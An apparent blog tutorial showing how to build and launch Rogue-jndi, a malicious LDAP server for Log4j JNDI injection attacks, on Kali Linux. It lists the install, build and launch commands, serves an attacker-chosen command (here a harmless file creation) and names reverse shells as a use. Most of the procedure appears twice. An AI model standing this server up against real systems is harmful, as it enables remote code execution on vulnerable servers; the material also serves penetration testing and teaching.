Following the previous tutorial in which we looked at the log4j vulnerability in VMWare vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker controlled LDAP server is required to provide the malicious java class (with a reverse shell for example) in response to the forged LDAP request from the server running a vulnerable version of Log4j. There are quiet a few solutions out there that provide this functionality and one of them is Rogue-jndi. Rogue-jndi is a malicious LDAP server for JNDI injection attacks. In the next section I will give a short demonstration of how to install rogue-jndi on the latest version of Kali Linux. along with the required dependencies.
To build rogue-jndi, Java v1.7+ and Maven v3+ are required on the system. Java is already installed by default so we only have to install Maven. Maven can be installed with the following commands:
sudo apt-get update
sudo apt-get install maven
Press y to install Maven.
The next step is to clone the rogue-jndi repository. We will do this at the Desktop of the Kali user and change directory to the cloned folder with the following commands:
cd Desktop
git clone https://github.com/veracode-research/rogue-jndi.git
cd rogue-jndi
Clone the rogue-jndi repository.
Inside the rogue-jndi folder we have to run the following command to build the rogue-jndi project which will take a minute or two to complete:
mvn package
The build process for rogue-jndi is started with the mvn package command.
The following output indicates that the build process completed successfully:
Build process completed successfully.
We can also see that the ‘target’ folder was created on our system that contains the jar file that can be executed with Java:
RogueJndi-1.1.jar was created on our system.
We can run rogue-jndi and output the usage instructions with the following command:
java -jar target/RogueJndi-1.1.jar -h
Rogue-jndi usage instructions
At this point we can start the vulnerable LDAP server with the required parameters, such as a command that will be served as Java class in response to an LDAP query. The following command starts the LDAP server and provides a Java class that creates a text file on the system as used in.
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test.txt" --hostname "172.16.5.2"
he malicious LDAP server is running.
From here we can exploit vulnerable Log4j applications with payloads that connect to our malicious LDAP server.
To build rogue-jndi, Java v1.7+ and Maven v3+ are required on the system. Java is already installed by default so we only have to install Maven. Maven can be installed with the following commands:
sudo apt-get update
sudo apt-get install maven
Press y to install Maven.
The next step is to clone the rogue-jndi repository. We will do this at the Desktop of the Kali user and change directory to the cloned folder with the following commands:
cd Desktop
git clone https://github.com/veracode-research/rogue-jndi.git
cd rogue-jndi
Inside the rogue-jndi folder we have to run the following command to build the rogue-jndi project which will take a minute or two to complete:
mvn package
The build process for rogue-jndi is started with the mvn package command.
The following output indicates that the build process completed successfully:
We can also see that the ‘target’ folder was created on our system that contains the jar file that can be executed with Java:
RogueJndi-1.1.jar was created on our system.
We can run rogue-jndi and output the usage instructions with the following command:
java -jar target/RogueJndi-1.1.jar -h
Rogue-jndi usage instructions
At this point we can start the vulnerable LDAP server with the required parameters, such as a command that will be served as Java class in response to an LDAP query. The following command starts the LDAP server and provides a Java class that creates a text file on the system as used in.
java -jar target/RogueJndi-1.1.jar --command "touch /tmp/test.txt" --hostname "172.16.5.2"
he malicious LDAP server is running.
From here we can exploit vulnerable Log4j applications with payloads that connect to our malicious LDAP server.